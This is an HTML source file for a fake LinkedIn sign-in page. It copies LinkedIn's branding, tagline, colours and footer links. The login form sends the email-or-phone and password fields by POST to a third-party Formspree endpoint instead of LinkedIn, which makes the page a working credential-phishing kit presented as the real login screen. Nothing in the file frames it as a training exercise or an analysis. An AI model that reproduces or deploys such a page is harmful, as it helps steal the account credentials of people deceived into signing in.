<!DOCTYPE html>
<html>
<head>
    <title>|LinkedIn|</title>
    <style>

    .o{
        height:374.3px;
        width:415px;
        border-radius: 7px 7px 7px 7px;
        background-color:white ;
        box-shadow: 2px 2px 13px lightgrey;
        margin-top:27px;
        margin-left:36.3%;   
    }
    input.m{
        width: 333px;
        height: 34px;
        padding: 8px 8px;
        margin-left: 31px;
        border-radius: 4px;
        border-width: 1px;
    }
    input.n{
        width: 350px;
        height: 50px;
        padding: 8px 8px;
        margin-left: 31px;
        border-radius: 25px;
        border-width: 0px;
        background-color: #0A66C2;
    }
    input.n:hover{
        background-color: #004182;
    }
    h1{
        font-size: 28px;
        font-family: Microsoft JhengHei;
        padding-top: 23px;
        margin-left: 31px;
    }
    p.a{
        font-family:Microsoft JhengHei;
        font-size: 12px;
        font-weight: lighter;
        margin-top: 0px;
        margin-left: 0px;
    }
    p.b{
       font-family:Microsoft JhengHei;
       font-size: 15px;
       font-weight: bolder;
       color: #0A66C2;
       margin-left: 31px; 
    }
    p.b:hover{
        width: 150px;
        height: 25px;
        padding: 3px 2px;
        border-radius: 20px;
        background-color: #D0E8FF;
    }
    input[type="text"]{
        font-family:  Microsoft JhengHei;
        font-size: 16px;
    }
    input[type="password"]{
        font-family:  Microsoft JhengHei;
        font-size: 16px;
    }
    input[type="submit"]{
        font-family:  Microsoft JhengHei;
        font-size: 16px;
        color: white;
        font-weight: bolder;
    }
    img.h{
        width: 109px;
        height: 28px;
        margin:0 auto;
    }
    div.j{
        margin-top:86px;
        margin-left:36.3%;
    }
    h3{
        font-family:  Microsoft JhengHei;
        font-size: 14px;
        font-weight: normal;
        margin-left: 43.5%;   
    }
    label{
        color: #0A66C2;
        font-weight: bolder;
    }
    label:hover{
        width: 90px;
        height: 80px;
        padding: 3px 3px;
        border-radius: 20px;
        background-color: #D0E8FF;
    }
    div.f{
        width: 900px;
        margin-top: 90px;
        margin-left: 20%;
    }
    li{
        font-family:  Microsoft JhengHei;
        font-size: 10px;
        font-weight: bolder;
        padding: 2px 10px;
        display: inline-block;
        color: #6C6970;
    }
    img.z{
        width: 52px;
        height: 15px;
    }
    select{
        border: none;
        font-family:  Microsoft JhengHei;
        font-size: 10px;
        font-weight: bolder;
        color: #6C6970;
    }
</style>
</head>
<body>
    <div>
         <div class="j"><img class="h" src="LINN.png"></div>
        <div class="o">
            <h1>Sign in<br>
            <p class="a">Stay updated on your professional world</p></h1><br>
            <form
  action="https://formspree.io/f/xayadbnp"
  method="POST"
><input class="m" type="text" name="Email or Phone" placeholder="Email or Phone"><br><br><br>
            <input class="m" type="password" name="Password" placeholder="Password"><br>
            <p class="b"> <a href="*" style="text-decoration: none;">Forgot password?</a></p>
            <input class="n" type="Submit" name="Sign in" value="Sign In" placeholder="Sign in">
        </div><br><br>
        <h3>New to LinkedIn?<label><a href="*" style="text-decoration: none;"> Join now</label></h3></from>
        <div class="f">
            <ul>
                <li><img class="z" src="LINNB.png"> © 2021</li>
                <li><a href="*" style="text-decoration: none; color: #6C6970;">User Agreement</li>
                <li><a href="*" style="text-decoration: none; color: #6C6970;">Privacy Policy</li>
                <li><a href="*" style="text-decoration: none; color: #6C6970;">Community Guidelines</li>
                <li><a href="*" style="text-decoration: none; color: #6C6970;">Cookie Policy</li>
                <li><a href="*" style="text-decoration: none; color: #6C6970;">Copyright Policy</li>
                <li><a href="*" style="text-decoration: none; color: #6C6970;" >Send Feedback</li>
                <li><a href="*" style="text-decoration: none;"><select>
                <option value="Language">Language</option>
                <option value="English">English</option>  
                <option value="Arabic"> Arabic</option>
                <option value="German"> German</option>
                <option value="Japanese"> Japanese</option>
                <option value="French"> French</option></select>
                </li>
            </ul>
        </div>
    </div>
</body>
</html>
